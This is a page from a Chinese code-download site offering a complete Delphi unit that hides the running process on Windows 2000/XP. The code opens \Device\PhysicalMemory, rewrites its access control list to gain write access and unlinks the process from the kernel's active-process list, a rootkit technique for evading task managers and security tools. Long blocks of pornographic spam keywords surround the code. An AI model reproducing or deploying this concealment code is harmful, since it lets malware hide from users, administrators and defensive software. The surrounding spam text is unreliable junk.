亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? hideprocess.~pas

?? 在Delphi下隱藏程序進(jìn)程
?? ~PAS
字號:
unit HideProcess;

interface

function MyHideProcess: Boolean;

implementation

uses
  Windows, SysUtils, Variants, Classes, AclAPI, accCtrl;

type
  NTSTATUS = LongInt;

const
  //NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
  STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
  STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
  OBJ_INHERIT = $00000002;
  OBJ_PERMANENT = $00000010;
  OBJ_EXCLUSIVE = $00000020;
  OBJ_CASE_INSENSITIVE = $00000040;
  OBJ_OPENIF = $00000080;
  OBJ_OPENLINK = $00000100;
  OBJ_KERNEL_HANDLE = $00000200;
  OBJ_VALID_ATTRIBUTES = $000003F2;

type
  PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
  IO_STATUS_BLOCK = record
    Status: NTSTATUS;
    FObject: DWORD;
  end;

  PUNICODE_STRING = ^UNICODE_STRING;
  UNICODE_STRING = record
    Length: Word;
    MaximumLength: Word;
    Buffer: PWideChar;
  end;

  POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
  OBJECT_ATTRIBUTES = record
    Length: DWORD;
    RootDirectory: Pointer;
    ObjectName: PUNICODE_STRING;
    Attributes: DWORD;
    SecurityDescriptor: Pointer;
    SecurityQualityOfService: Pointer;
  end;

  TZwOpenSection = function(SectionHandle: PHandle;
    DesiredAccess: ACCESS_MASK;
    ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
  TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
    SourceString: PWideChar); stdcall;

var
  RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
  ZwOpenSection: TZwOpenSection = nil;
  g_hNtDLL: THandle = 0;
  g_pMapPhysicalMemory: Pointer = nil;
  g_hMPM: THandle = 0;
  g_hMPM2: THandle = 0;
  g_osvi: OSVERSIONINFO;
  b_hide: Boolean = false;
//---------------------------------------------------------------------------

function InitNTDLL: Boolean;
begin
  g_hNtDLL := LoadLibrary('ntdll.dll');

  if 0 = g_hNtDLL then
  begin
    Result := false;
    Exit;
  end;

  RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
  ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');

  Result := True;
end;
//---------------------------------------------------------------------------

procedure CloseNTDLL;
begin
  if (0 <> g_hNtDLL) then
    FreeLibrary(g_hNtDLL);
  g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------

procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
  pDacl: PACL;
  pSD: PPSECURITY_DESCRIPTOR;
  pNewDacl: PACL;
  dwRes: DWORD;
  ea: EXPLICIT_ACCESS;
begin
  pDacl := nil;
  pSD := nil;
  pNewDacl := nil;

  dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);

  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;

  ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
  ea.grfAccessPermissions := SECTION_MAP_WRITE;
  ea.grfAccessMode := GRANT_ACCESS;
  ea.grfInheritance := NO_INHERITANCE;
  ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
  ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
  ea.Trustee.ptstrName := 'CURRENT_USER';

  dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);

  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;

  dwRes := SetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl, nil);

  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;

end;
//---------------------------------------------------------------------------

function OpenPhysicalMemory: THandle;
var
  status: NTSTATUS;
  physmemString: UNICODE_STRING;
  attributes: OBJECT_ATTRIBUTES;
  PhyDirectory: DWORD;
begin
  g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
  GetVersionEx(g_osvi);

  if (5 <> g_osvi.dwMajorVersion) then
  begin
    Result := 0;
    Exit;
  end;

  case g_osvi.dwMinorVersion of
    0: PhyDirectory := $30000;
    1: PhyDirectory := $39000;
  else
    begin
      Result := 0;
      Exit;
    end;
  end;

  RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');

  attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
  attributes.RootDirectory := nil;
  attributes.ObjectName := @physmemString;
  attributes.Attributes := 0;
  attributes.SecurityDescriptor := nil;
  attributes.SecurityQualityOfService := nil;

  status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);

  if (status = STATUS_ACCESS_DENIED) then
  begin
    ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
    SetPhyscialMemorySectionCanBeWrited(g_hMPM);
    CloseHandle(g_hMPM);

    status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
  end;

  if not (LongInt(status) >= 0) then
  begin
    Result := 0;
    Exit;
  end;

  g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
    FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);

  if (g_pMapPhysicalMemory = nil) then
  begin
    Result := 0;
    Exit;
  end;

  Result := g_hMPM;
end;
//---------------------------------------------------------------------------
function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
var
  VAddr, PGDE, PTE, PAddr, tmp: DWORD;
begin
  VAddr := DWORD(addr);
//  PGDE := BaseAddress[VAddr shr 22];
  PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // Modify by dot.

  if 0 = (PGDE and 1) then
  begin
    Result := nil;
    Exit;
  end;

  tmp := PGDE and $00000080;

  if (0 <> tmp) then
  begin
    PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);
  end
  else
  begin
    PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
//    PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];
    PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // Modify by dot.

    if (0 = (PTE and 1)) then
    begin
      Result := nil;
      Exit;
    end;

    PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);
    UnmapViewOfFile(Pointer(PGDE));
  end;

  Result := Pointer(PAddr);
end;
//---------------------------------------------------------------------------

function GetData(addr: Pointer): DWORD;
var
  phys, ret: DWORD;
  tmp: PDWORD;
begin
  phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
    phys and $FFFFF000, $1000));

  if (nil = tmp) then
  begin
    Result := 0;
    Exit;
  end;

//  ret := tmp[(phys and $FFF) shr 2];
  ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // Modify by dot.
  UnmapViewOfFile(tmp);

  Result := ret;
end;
//---------------------------------------------------------------------------

function SetData(addr: Pointer; data: DWORD): Boolean;
var
  phys: DWORD;
  tmp: PDWORD;
begin
  phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));

  if (nil = tmp) then
  begin
    Result := false;
    Exit;
  end;

//  tmp[(phys and $FFF) shr 2] := data;
  PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // Modify by dot.
  UnmapViewOfFile(tmp);

  Result := TRUE;
end;
//---------------------------------------------------------------------------
{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
begin
 ExitProcess(0);
 return 1 ;
end }
//---------------------------------------------------------------------------

function YHideProcess: Boolean;
var
  thread, process: DWORD;
  fw, bw: DWORD;
begin
//  SetUnhandledExceptionFilter(exeception);
  if (FALSE = InitNTDLL) then
  begin
    Result := FALSE;
    Exit;
  end;

  if (0 = OpenPhysicalMemory) then
  begin
    Result := FALSE;
    Exit;
  end;

  thread := GetData(Pointer($FFDFF124)); //kteb
  process := GetData(Pointer(thread + $44)); //kpeb

  if (0 = g_osvi.dwMinorVersion) then
  begin
    fw := GetData(Pointer(process + $A0));
    bw := GetData(Pointer(process + $A4));

    SetData(Pointer(fw + 4), bw);
    SetData(Pointer(bw), fw);

    Result := TRUE;
  end
  else if (1 = g_osvi.dwMinorVersion) then
  begin
    fw := GetData(Pointer(process + $88));
    bw := GetData(Pointer(process + $8C));

    SetData(Pointer(fw + 4), bw);
    SetData(Pointer(bw), fw);

    Result := TRUE;
  end
  else
  begin
    Result := False;
  end;

  CloseHandle(g_hMPM);
  CloseNTDLL;
end;

function MyHideProcess: Boolean;
begin
  if not b_hide then
  begin
    b_hide := YHideProcess;
  end;

  Result := b_hide;
end;

end.

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
91免费观看视频在线| 国产成人免费视频精品含羞草妖精| 99精品国产热久久91蜜凸| 国产精品国产精品国产专区不片| 丁香啪啪综合成人亚洲小说| 国产精品对白交换视频 | 欧美精品vⅰdeose4hd| 亚洲午夜久久久久久久久电影院| 7777精品伊人久久久大香线蕉最新版| 日本在线播放一区二区三区| 日韩美女在线视频| 丁香五精品蜜臀久久久久99网站| 自拍av一区二区三区| 欧美日韩一二区| 国产一区二区三区电影在线观看 | 国产在线精品免费| 亚洲国产精品高清| 欧美亚洲综合在线| 韩国精品主播一区二区在线观看| 国产精品久久久久久久久久久免费看 | 精品国产一区二区三区久久影院 | 色综合久久天天综合网| 无吗不卡中文字幕| 国产免费成人在线视频| 欧美在线免费播放| 国产一区二区三区| 亚洲在线观看免费视频| 久久影院午夜片一区| 欧美做爰猛烈大尺度电影无法无天| 日本欧洲一区二区| 自拍偷拍欧美精品| 精品国产成人在线影院 | 欧美日本在线观看| 国产成人自拍网| 亚瑟在线精品视频| 欧美国产丝袜视频| 日韩欧美精品三级| 在线免费观看视频一区| 国产91在线|亚洲| 日韩黄色一级片| 成人免费在线播放视频| 日韩欧美一级精品久久| 欧美亚洲国产怡红院影院| 国产99精品国产| 免费成人深夜小野草| 亚洲自拍偷拍av| 国产精品毛片无遮挡高清| 日韩一区二区在线观看视频| 91亚洲精品一区二区乱码| 国产精品99久久久| 美女脱光内衣内裤视频久久网站| 亚洲精品亚洲人成人网| 欧美国产日本视频| 欧美精品一区二区久久婷婷| 欧美军同video69gay| 欧美在线影院一区二区| 懂色av一区二区三区免费观看| 青青国产91久久久久久| 亚洲国产精品一区二区尤物区| 国产精品久久久久久久久免费丝袜| 2024国产精品| 日韩欧美二区三区| 777亚洲妇女| 制服丝袜亚洲播放| 欧美美女网站色| 欧美性videosxxxxx| 在线观看日韩精品| 91美女在线看| 日本精品一级二级| 91毛片在线观看| 一道本成人在线| 91福利视频久久久久| 91精品福利视频| 欧美午夜精品久久久久久孕妇 | 亚洲国产一区在线观看| 亚洲蜜桃精久久久久久久| 亚洲日本在线a| 亚洲精品一二三| 亚洲综合成人在线视频| 亚洲国产精品天堂| 亚洲aaa精品| 男人的天堂亚洲一区| 久久精品国产亚洲高清剧情介绍 | 亚洲一区二区在线视频| 亚洲亚洲人成综合网络| 视频在线观看一区二区三区| 婷婷国产在线综合| 日本成人在线视频网站| 捆绑调教美女网站视频一区| 极品瑜伽女神91| 成人一区二区在线观看| 91色.com| 欧美一区二区视频在线观看 | 国产精品一二三四五| 成av人片一区二区| 在线国产亚洲欧美| 欧美精品777| 久久久久久久久久看片| 国产精品久久一级| 亚洲国产另类精品专区| 久久精品久久精品| 国产成人精品午夜视频免费 | 国产成人福利片| 色综合色综合色综合| 91精品一区二区三区在线观看| 精品国产一区二区在线观看| 中文字幕在线不卡一区二区三区| 一区二区在线免费| 麻豆一区二区99久久久久| 国产成人亚洲精品狼色在线| 色94色欧美sute亚洲线路一久| 欧美日高清视频| 国产性天天综合网| 亚洲成人在线网站| 国产很黄免费观看久久| 欧美日韩一区在线| 欧美激情在线一区二区三区| 亚洲国产视频a| 国产风韵犹存在线视精品| 日本韩国欧美一区二区三区| 日韩一级高清毛片| 一区二区三区四区亚洲| 九九**精品视频免费播放| 97精品视频在线观看自产线路二 | 国产日韩影视精品| 亚洲成人综合在线| 成人av资源网站| 欧美大片国产精品| 亚洲国产成人高清精品| 丁香另类激情小说| 欧美mv日韩mv国产| 亚洲综合免费观看高清完整版| 国产一区二区成人久久免费影院 | 日韩午夜三级在线| 一区二区三区蜜桃网| 盗摄精品av一区二区三区| 日韩精品一区二区三区中文精品| 亚洲视频在线一区| 国产成人综合自拍| 精品久久久久久久久久久院品网 | 一区二区三区美女视频| 国产精品99久久久久久久vr| 3d成人h动漫网站入口| 一区二区三区四区在线免费观看| 成人午夜大片免费观看| 精品国产乱码久久久久久图片 | 亚洲高清免费在线| 99久久99久久综合| 国产午夜精品在线观看| 美女精品自拍一二三四| 欧美日韩中文字幕精品| 日本不卡视频在线观看| av亚洲精华国产精华| 久久精品亚洲乱码伦伦中文| 免费高清视频精品| 欧美一三区三区四区免费在线看| 夜夜嗨av一区二区三区四季av| 成人精品视频一区二区三区尤物| 亚洲精品一线二线三线| 毛片av中文字幕一区二区| 7878成人国产在线观看| 日韩精品成人一区二区在线| 欧美日韩日日夜夜| 性感美女久久精品| 欧美蜜桃一区二区三区| 亚洲成人免费av| 欧美高清激情brazzers| 午夜久久久久久电影| 欧美疯狂做受xxxx富婆| 日韩精品一二三区| 欧美一区二区三区成人| 蜜臂av日日欢夜夜爽一区| 日韩三级视频在线观看| 精品影视av免费| 精品粉嫩aⅴ一区二区三区四区| 婷婷成人激情在线网| 日韩欧美视频一区| 国产在线精品不卡| 国产精品妹子av| 91麻豆产精品久久久久久 | 欧美视频三区在线播放| 亚洲国产乱码最新视频| 日韩一区二区中文字幕| 国内精品久久久久影院一蜜桃| 久久一区二区视频| 99re这里只有精品首页| 亚洲综合在线视频| 日韩一区二区精品在线观看| 国内不卡的二区三区中文字幕| 国产午夜精品一区二区 | 亚洲成人综合在线| 精品人在线二区三区| 福利电影一区二区三区| 亚洲日本一区二区三区| 欧美肥妇毛茸茸| 国产乱人伦偷精品视频不卡| 1000部国产精品成人观看| 欧美日韩性生活| 国产一区二区三区精品视频| 亚洲青青青在线视频|